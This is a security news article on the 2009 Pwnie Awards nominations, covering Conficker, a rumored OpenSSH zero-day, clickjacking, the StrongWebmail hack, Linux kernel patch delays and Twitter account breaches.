To get security news and tips delivered to your inbox, click here to sign up for our free newsletter.
The Conficker worm, responsible for infecting millions of machines is one of three nominees for most over-hyped bug for the annual Pwnie Awards.
The informal award ceremony, which takes place each year at the Black Hat briefings in Las Vegas, recognizes security industry failures and over-hyped bugs as well as achievements in the hacker community. The 2009 nominees, which span 10 categories, were announced Tuesday.
The Microsoft RPC worm, known by many as Conficker/Downadup, was thought to have infected an estimated 10 million machines at its peak in January. Media attention reached a frenzy in March, when researchers announced that the worm would change its algorithm on April 1 enabling it to thwart attempts by the Conficker Working Group to disrupt command and control. Conficker updated April 1 with little fanfare.
Still, researchers are puzzled by the botnet's inactivity. Mikko Hyppönen of F-Secure Corp. is intrigued by the mystery of the motives behind Conficker. He plans to present his research next week at Black Hat.
Also nominated for most over-hyped bug was an unsubstantiated OpenSSH zero-day flaw. The software is used by ISPs to secure network traffic. Rumors of the zero-day were announced on July 7 by Marcus Sachs, director of the SANS Internet Storm Center. According to the nomination, there were a number of "rash reactions," including one ISP, midPhase, that disabled public SSH ports on all shared accounts.
Clickjacking, a method of tricking users to click on buttons in a Web page, also received a nomination for most over-hyped bug. If used maliciously, the technique could grant site access to the computer's webcam and microphone. Security researchers Jeremiah Grossman and Robert 'RSnake' Hansen, delayed their clickjacking presentation at the OWASP 2009 security conference at the request of Adobe Systems Inc. The two researchers discovered the attack vector and also found a way to execute the same kind of attack in Flash files.
Nominees for Most Epic FAIL included StrongWebmail CEO Darren Berkovitz who issued a challenge to hackers to break into his StrongWebmail email account. Security researchers Aviv Raff, Lance James and Mike Bailey took Berkovitz challenge seriously, exploiting a cross-site scripting flaw to gain access to his account.
Also nominated was "Linux default kernel security," and the Linux kernel development team for their response to Linux kernel errors. According to a team of researchers at MIT, the development team does not distribute updates for all disclosed OS bugs in a timely manner. The MIT team examined the Linux kernel from January 2006 to December 2008 and found that of 218 Linux kernel flaws, 25.7% had more than two weeks of impact delay and 14% had more than eight weeks of impact delay.
"We have shown that, following the disclosure of many core OS bugs, weeks or months lapse before they are identified as security bugs," according to the report. "Based on historical lessons and our own exploit investigation, we conclude that disclosed bugs present a significant security risk until they are fixed with an update, regardless of their perceived security impact."
The final nomination for Most Epic FAIL was Twitter hacking and security of data in the "cloud." Twitter has been the subject of a number of security incidents, including the hijacking of several high profile accounts. It has been frequently targeted by attackers to spread worms and phish users. But the latest incident involves Jason Goldman, director of product management at Twitter, who had his email hacked as a result of poor password practices. Access to his account led hackers to enter other Twitter staff's personal accounts, including Twitter co-founder Evan Williams. The incident became embarrassingly high profile when tech blog TechCrunch posted some of the details, including information on company strategy meetings and email exchanges.
In 2008, Dan Kaminsky accepted the award for Most Over-hyped Bug for his discovery of the DNS cache poisoning flaw. Debian, the Linux OS, received the Most Epic FAIL award for shipping a backdoored OpenSSL library for two years.